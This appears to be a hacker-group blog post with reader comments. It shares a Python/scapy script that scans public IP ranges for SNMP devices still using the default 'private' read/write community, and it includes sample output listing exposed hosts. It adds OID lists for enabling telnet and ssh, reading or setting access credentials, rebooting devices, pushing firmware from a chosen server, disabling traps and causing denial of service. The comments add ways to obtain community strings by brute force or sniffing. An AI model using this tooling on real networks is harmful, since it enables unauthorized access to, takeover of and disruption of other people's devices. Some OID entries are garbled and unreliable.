At the last meeting dw5304 gave a demo on snmp scanning and gaining access to things you shouldn’t have access to with a few home brew windows apps he coded up. Its been a while since I messed with snmp but his demo got me back into it, so I made a little python script to scan subnets for open snmp servers with the read/write string set to private. Here is the code:
#! /usr/bin/env python
import commands
from scapy.all import *
base = "69.2.1." #IP range to scan minus the last octet.
f = open('/tmp/snmp_output.txt', 'w+')
for i in range(1, 255):
ip = base+str(i)
print ip+"\n"
p = IP(dst=ip)/UDP(dport=161, sport=39445)/SNMP(community="private",PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1.0"))]))
pkt = sr1(p, timeout=1)
if pkt and pkt.sprintf("%IP.proto%") != "icmp":
p1 = pkt.sprintf("%SNMP.PDU%").split("ASN1_STRING['", 1)
p2 = p1[1].split("'", 1)
print pkt.sprintf("%IP.src%")+" - "+p2[0]
f.write(pkt.sprintf("%IP.src%")+" - "+p2[0]+"\n")
f.close()
print "\nDONE!!!!!!!!!!!!!!!\n"
Its a little hacked together and could use improvement but it works “feel free to send in any improvements you make”. It puts all the found servers IPs in /tmp/snmp_output.txt along with their system description enumerated via snmp. Here is a sample output:
69.1.117.87 - Ruckus Wireless Inc (C) 2006
69.1.117.156 - Ruckus Wireless Inc (C) 2006
69.1.117.190 - Ruckus Wireless Inc (C) 2006
69.1.117.193 - Ruckus Wireless Inc (C) 2006
69.1.117.203 - Ruckus Wireless Inc (C) 2006
69.1.117.221 - Ruckus Wireless Inc (C) 2006
69.1.163.92 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
69.1.163.93 - Product: GW 4 FXS;SW Version: 5.80A.023.006
Once you find a few servers you can do snmpwalks on them and scour it for juicy info.
Here are some good OIDs to look for and/or set: *found most of this online & got some from dw5304
ip.ipForwarding.0 <-this tells you if its forwarding packets or not "useful to DoS a device"
1.3.6.1.2.1.4.24.2.1.1 <-ipforwardingdest
sysName.0 <-device name
1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0 i 1 ... EnableTelnetServer.
1.3.6.1.4.1.4413.2.2.2.1.1.1.1.0....telnetIpStackInterfaces.
1.3.6.1.4.1.4413.2.2.2.1.1.1.2.0....telnetUserName..
1.3.6.1.4.1.4413.2.2.2.1.1.1.3.0....telnetPassword..
1.3.6.1.4.1.4413.2.2.2.1.1.1.4.0....telnetServerControl.
1.3.6.1.4.1.4413.2.2.2.1.1.1.5.0....telnetSessionIp.
1.3.6.1.4.1.4413.2.2.2.1.1.1.6.0....telnetSessionInProgress.
1.3.6.1.4.1.4413.2.2.2.1.1.1.7.0....telnetForceUserLogout.
1.3.6.1.2.1.1.1.0 = System Description
1.3.6.1.2.1.1.3.0 = Modem up time
1.3.6.1.2.1.4 = Some useful information (walk)
1.3.6.1.2.1.4.20.1.1.0 = HFC IP (getnext)
1.3.6.1.2.1.4.20.1.3.0 = HFC Subnet (getnext)
1.3.6.1.2.1.2.2.1.6.2= Mac
1.3.6.1.2.1.10.127.1.1.3.1.3.1 = Maximum upload bandwidth
1.3.6.1.2.1.10.127.1.1.3.1.5.1 = Maximum download bandwidth
1.3.6.1.2.1.10.127.1.1.4.1 = Current status (walk)
1.3.6.1.2.1.17.4.3.1.1.0 = Hosts behind modem
1.3.6.1.2.1.69.1.4.4.0 = TFTP Configuration file server IP
1.3.6.1.2.1.69.1.4.5.0 = Configuration file name
1.3.6.1.2.1.69.1.3.5.0 = Current firmware
1.3.6.1.2.1.69.1.4.2.0 = DHCP Server IP
1.3.6.1.2.1.69.1.4.3.0 = Time Server IP
1.3.6.1.2.1.69.1.5.8.1.7 = View Log (walk)
1.3.6.1.2.1.10.127.1.1.1.1.2.3 = Downstream Frequency
1.3.6.1.2.1.69.1.4.5.0 = Image File
1.3.6.1.2.1.17.4.3.1.1 = Learned MAC (Get Next)
---[ Read / Write OIDs
1.3.6.1.2.1.69.1.1.3.0 = Boot modem (1=boot now)
1.3.6.1.2.1.69.1.3.1.0 = TFTP Firmware server IP
1.3.6.1.2.1.69.1.3.2.0 = Firmware filename
1.3.6.1.2.1.69.1.3.3.0 = Firmware update status (1=update now, 2=update on boot,3=disable updates)
1.3.6.1.2.1.69.1.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled)
1.3.6.1.2.1.69.1.5.3.0 = SNMP Traps status (1=enabled, 4=disabled)
1.3.6.1.4.1.1166.1.19.3.1.14.0 = SNMP Port
1.3.6.1.4.1.1166.1.19.3.1.15.0 = SNMP Traps port
1.3.6.1.4.1.1166.1.19.3.1.17.0 = HTML Server status (1=enabled, 2=disabled)Other OIDs
1.3.6.1.2.1.1.5.0 = modem type
1.3.6.1.3.83.1.1.4.0 = Cable Modem Serial Number
1.3.6.1.3.83.1.4.5.0 = Alternate OID for Config File
1.3.6.1.3.83.1.4.3.0 = Provisional Server
1.3.6.1.2.1.1.6.0 = Area String
1.3.6.1.2.1.4.20.1.3+(hfc ip) = Subnet Example 1.3.6.1.2.4.20.1.3.10.169.53.2451.3.6.1.3.103.1.5.1.3.1.5 = CPE USB MAC
1.3.6.1.2.1.2.2.1.6.1 = Cable Modem USB MAC
1.3.1.6.1.2.1.10.127.1.2.1.1.1.2 = Default Gateway MAC Address
1.3.6.1.2.1.2.10.127.1.1.3.1.6.1 = Max Burst Up
1.3.6.1.2.1.2.2.1.6.5 = CPE MAC
1.3.6.1.4.1.1166.1.19.3.1.17.0Ii 1 or 0 enable or disable webif
1.3.6.1.4.1.4413.2.2.2.1.1.4.1 =”reflects the IP stack interfaces on which a ssh 1.3.6.1.4.1.4413.2.2.2.1.1.4.2 = "reflects the user name which will be allowed ssh access."
1.3.6.1.4.1.4413.2.2.2.1.1.4.3 = "reflects the password which will be allowed ssh access."
1.3.6.1.4.1.4413.2.2.2.1.1.4.4 = "start or stop the ssh server.
1.3.6.1.4.1.4413.2.2.2.1.1.4.7 =terminate ssh session
You can find a lot more online. Enjoy and happy hacking 🙂
How do you go about finding the r/w community? “private string” 🙂
If they bother to set it you have to brute force it or capture it while sniffing packets/MITM. Otherwise using the default “private” works more often then you would expect.
I was able to get some results running a quick snmp sweep using my ISPs public community that u can easily catch in wire-shark when your connected directly to the cable modem.
isn’t the rw only passed through the docsis layer on coax and not visible on CPE side? id love to play around with the fun oids that require rw access =P